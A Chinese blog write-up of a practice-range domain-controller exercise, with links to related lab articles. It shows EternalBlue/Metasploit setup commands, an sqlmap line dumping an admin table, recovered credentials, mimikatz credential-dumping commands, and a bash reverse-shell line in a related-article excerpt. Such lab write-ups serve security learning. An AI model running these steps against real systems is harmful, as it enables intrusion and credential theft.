云尘靶场-铁三域控

2024-02-13 23:50
文章标签 靶场 云尘 铁三域

本文主要是介绍云尘靶场-铁三域控,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

第一次

通过vpn链接 然后fscan扫描c段

扫描出来三个ip存活 并且141存在永恒之蓝

我们看看能不能直接复现

按照原本的设置发现 提示这里需要通过32位来进行

那我们开始设置

利用MS17-010渗透win7(32位)_利用ms17-010渗透win7(32位)-CSDN博客

https://github.com/1stPeak/Eternalblue-Doublepulsar-Metasploit-master通过上面进行下载然后修改解压后的文件夹名字为 Eternalblue-Doublepulsar-Metasploit然后将内容设置在 /root 目录下进入文件夹cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb复制到msf的payload中然后开始设置32位kalidpkg --add-architecture i386 && apt-get update && apt-get install wine32wine cmd.exe这里就设置完毕了

 然后我们开始利用

use exploit/windows/smb/eternalblue_doublepulsarset payloadset RHOST ipset LHOST kali的iprun 

利用失败 不知道

于是我们开始看其他的吧 我们可以发现123 开放了 80端口

去访问看看

织梦cms 是有洞的

首先不知道登录界面 我们开始扫目录

这里sql文件我们去访问

SQL注入

发现存在查询 很明显的注入

然后访问即可

 获取了flag2 但是flag1 去哪里了

我们继续看

看了别人的poc

都是在这种目录下 我们去访问一下dede

试试看弱口令

 这里还有一个 就是sql注入查看

-u http://172.25.0.123/sql/index.php?id=2 -D dedecmsv57utf8sp1 -T topsec_admin --dump

 MD5解密

然后我们测试的时候发现存在一个文件上传点

那我们写个🐎咯

发现并不需要 直接返回上一级就有了

这台机子就没东西了 因为没有其他内网了 所以我们还是需要通过永恒之蓝实现。。。。

去安装一下32位复现一下吧。。。。。

32位永恒之蓝(失败)

每次测试都是这样 所以我都在怀疑是我自己的问题还是环境的问题 于是我去虚拟机创建一个32位的win7测试

裂开 自己的环境可以实现。。。。 奇了怪了。。。

多半是环境的问题了。。。。

看了下面师傅们的评论

发现

检测也不行。。。

看wp咯

发现永恒之蓝不行了 但是我们sql的时候存在一个账号密码

有点类似win的账号密码 我们去看看

[16:48:24] [INFO] retrieved: administrator
[16:48:24] [INFO] retrieved: topsec.123

上了上了!!!!!

然后就G了没金币了 明天再来吧

第二次

第二次打开靶场开始链接 ok上不去了!!!!

是我的问题吗。。。。。

然后发现

其他用户 输入 administrator topsec.123就进去了。。。

发现了其他的域 那我们肯定就是要去看这个了

首先fscan上去扫一下咯

如何传文件搜一下就行了 会打开共享 然后就可以了

然后我们去扫描一下 上传32位的fscan

确实发现了就这两个电脑 我们要如何远控呢

这里看了桌面存在一个win32 我们进去看看

这个在vol见过 可以直接获取windows密码

我们使用看看

mimikatz # log
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

 但是最后我获取不到password 我也不知道为什么了

第二次靶场也结束了明天看看吧

第三次

实在解不出来

看了wp 获取了密码

不知道为什么 我的ssp 不存在

原本还想通过永恒之蓝 但是无法实现(太菜了)

获取了flag

不是很难 但是复现的问题很多 自己也不知道怎么实现

这篇关于云尘靶场-铁三域控的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/706954

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

tomato靶场攻略

1.使用nmap扫描同网段的端口,发现靶机地址 2.访问到主页面,只能看到一个大西红柿 3.再来使用dirb扫面以下有那些目录,发现有一个antibot_image 4.访问我们扫到的地址 ,点金目录里看看有些什么文件 5.看到info.php很熟悉,点进去看看   6.查看源代码发现是通过GET方式传参的 ,有文件包含漏洞 7. 利用文件包含漏洞,我们尝试查看一

Tomato靶场渗透测试

1.扫描靶机地址 可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了 2.打开网站 3.进行目录扫描 dirb    http://172.16.1.113 发现有一个antibot_image目录 4.访问这个目录 可以看到有一个info.php 5.查看页面源代码 可以发现可以进行get传参 6.尝试查看日志文件 http://172.16

攻防世界 —— 靶场笔记合集

靶场地址:https://adworld.xctf.org.cn/ 备注:此为靶场笔记合集的目录,是我接下来待更新的内容(主要是因为主线一篇太耗时间了,所以开通一条支线,来满足我日更两篇的目标,当该靶场更新完毕后,此条注释会删除) 0x01:Misc 0x02:Pwn 0x03:Web 0x0301:Web - Level 1 0x04:Reverse 0x05:Crypto

【靶场】upload-labs-master(前11关)

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】upload-labs-master(前11关) 第一关 Pass-01第二关 Pass-02第三关 Pass-03第四关 Pass-04第五关 Pass-05第六关 Pass-06第七关 Pass-07第八关 Pass-08第九关 Pass-09第十关 Pass-10第

pikachu文件包含漏洞靶场通关攻略

本地文件包含 先上传一个jpg文件,内容写上<?php phpinfo();?> 上传成功并且知晓了文件的路径 返回本地上传,并../返回上级目录 可以看到我们的php语句已经生效 远程文件包含 在云服务器上创建一个php文件 然后打开pikachu的远程文件包含靶场,随便选一个提交 在filename处修改为云服务器的目标地址 127.0.0.1/pik

【靶场】CTFshow—vip限免题目11~20

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场】CTFshow—vip限免题目11~20 域名txt记录泄露敏感信息公布内部技术文档泄露编辑器配置不当密码逻辑脆弱探针泄露CDN穿透js敏感信息泄露前端密钥泄露数据库恶意下载 域名txt记录泄露 提示:域名其实也可以隐藏信息,比如ctfshow.com 就